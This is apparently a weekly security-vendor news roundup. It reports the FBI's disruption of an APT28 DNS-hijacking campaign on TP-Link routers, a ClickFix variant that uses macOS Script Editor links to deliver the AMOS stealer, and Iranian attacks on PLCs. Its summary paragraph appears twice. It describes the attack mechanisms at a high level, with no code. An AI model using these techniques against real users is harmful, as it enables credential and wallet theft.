The Good, the Bad and the Ugly in Cybersecurity – Week 15

This week's cybersecurity landscape highlights significant state-sponsored activities and evolving malware delivery mechanisms. Russian GRU Unit 26165 (APT28) conducted a DNS hijacking campaign compromising thousands of TP-Link routers across the U.S. to steal credentials from government and critical infrastructure sectors. The FBI disrupted this network via Operation Masquerade. Simultaneously, Iranian APT actors targeted U.S. operational technology, exploiting Rockwell Automation PLCs causing operational disruptions. In the consumer sector, threat actors bypassed Apple's Terminal mitigations using Script Editor to deliver AMOS and Atomic Stealer malware via social engineering. This infostealer targets browser data and crypto wallets. Organizations should prioritize router firmware updates, monitor OT network traffic for anomalies, and educate macOS users against executing scripts from untrusted sources. Immediate mitigation includes resetting DNS configurations and applying vendor patches for PLCs and routers to prevent unauthorized access and data exfiltration.

FBI disrupts GRU router hijacking operation, ClickFix sidesteps Apple's Terminal mitigation, and Iranian actors exploit PLCs across U.S. infrastructure.

This week's cybersecurity landscape highlights significant state-sponsored activities and evolving malware delivery mechanisms. Russian GRU Unit 26165 (APT28) conducted a DNS hijacking campaign compromising thousands of TP-Link routers across the U.S. to steal credentials from government and critical infrastructure sectors. The FBI disrupted this network via Operation Masquerade. Simultaneously, Iranian APT actors targeted U.S. operational technology, exploiting Rockwell Automation PLCs causing operational disruptions. In the consumer sector, threat actors bypassed Apple's Terminal mitigations using Script Editor to deliver AMOS and Atomic Stealer malware via social engineering. This infostealer targets browser data and crypto wallets. Organizations should prioritize router firmware updates, monitor OT network traffic for anomalies, and educate macOS users against executing scripts from untrusted sources. Immediate mitigation includes resetting DNS configurations and applying vendor patches for PLCs and routers to prevent unauthorized access and data exfiltration. FBI disrupts GRU router hijacking operation, ClickFix sidesteps Apple's Terminal mitigation, and Iranian actors exploit PLCs across U.S. infrastructure. The Good | DoJ Disrupts TP-Link Router Network Run by Russian Spy Org This week, authorities in the U.S. carried out Operation Masquerade , a court-authorized operation to disrupt a DNS hijacking network run by Russia’s GRU Unit 26165 ( APT28 ). The network involved the compromise of thousands of TP-Link small home and small office routers, spread across more than 23 U.S. states. Since at least 2024, APT28 operators have been exploiting known vulnerabilities in the devices to steal credentials, gain unauthorized access to router management interfaces, and silently rewrite DNS settings so that queries were redirected to GRU-controlled resolvers instead of the users’ normal providers. The actors then applied automated filtering on the hijacked traffic to pick out DNS requests of intelligence interest. For selected targets, the resolvers returned forged DNS records for specific domains to insert GRU-controlled infrastructure into encrypted sessions. This allowed operators to collect passwords, authentication tokens, emails, and other sensitive data from devices on the same networks as the compromised routers, including users in government, military, and critical infrastructure sectors . Russian espionage group APT28 compromised MikroTik and TP-Link routers to redirect traffic for certain authentication operations to AitM phishing kits www.lumen.com/blog-and-new… [image or embed] — Catalin Cimpanu ( @campuscodi.risky.biz ) 7 April 2026 at 17:10 Under court supervision, the FBI developed and deployed a series of commands to send to compromised routers. The operation captured evidence of GRU activity and reset the DNS configuration so the devices would obtain legitimate resolvers from their ISPs. It also blocked the original path the actors used for unauthorized access . According to DOJ, the FBI first tested the command set on the same TP-Link router models and firmware in a controlled environment, with the goal of leaving normal routing functions intact, avoiding access to any user content, and ensuring that owners could reverse the changes via a factory reset or web management interface. The bureau is now working with U.S. internet service providers to notify customers whose routers fell within the scope of the warrant. The Bad | Threat Actors Turn to Script Editor to Bypass Apple’s ClickFix Mitigation SentinelOne researchers have discovered a variant of the ClickFix social engineering trick targeting macOS users that avoids the need for victims to unwittingly copy-paste commands to the Terminal. Apple recently updated the desktop operating system to include a mitigation for Terminal-driven ClickFix attacks, but threat actors have moved quickly to sidestep Apple’s response . SentinelOne researchers discovered a campaign in which threat actors used a lure to install the popular AI-Assistant Claude to deliver AMOS malware . The lure leverages the appplescript:// URL scheme to launch the Script Editor from the user’s browser, with the editor pre-populated with malicious commands. The delivery mechanism offers threat actors a smooth, Terminal-free, attack flow that simply asks the user to perform a few clicks, with no copy-paste involved. Instructions to victims Script Editor opens with pre-populated malicious commands Analysis of the payloads shows the technique is being used to deliver AMOS/Atomic Stealer malware that reaches out to hardcoded C2 infrastructure and attempts to exfiltrate browser data, crypto wallets and passsword stores in a single run. SentinelOne customers are protected against AMOS and similar variants of infostealer. Researchers at JAMF later described a similar campaign using a webpage themed to look like an official Apple help page with instructions on how to reclaim disk space....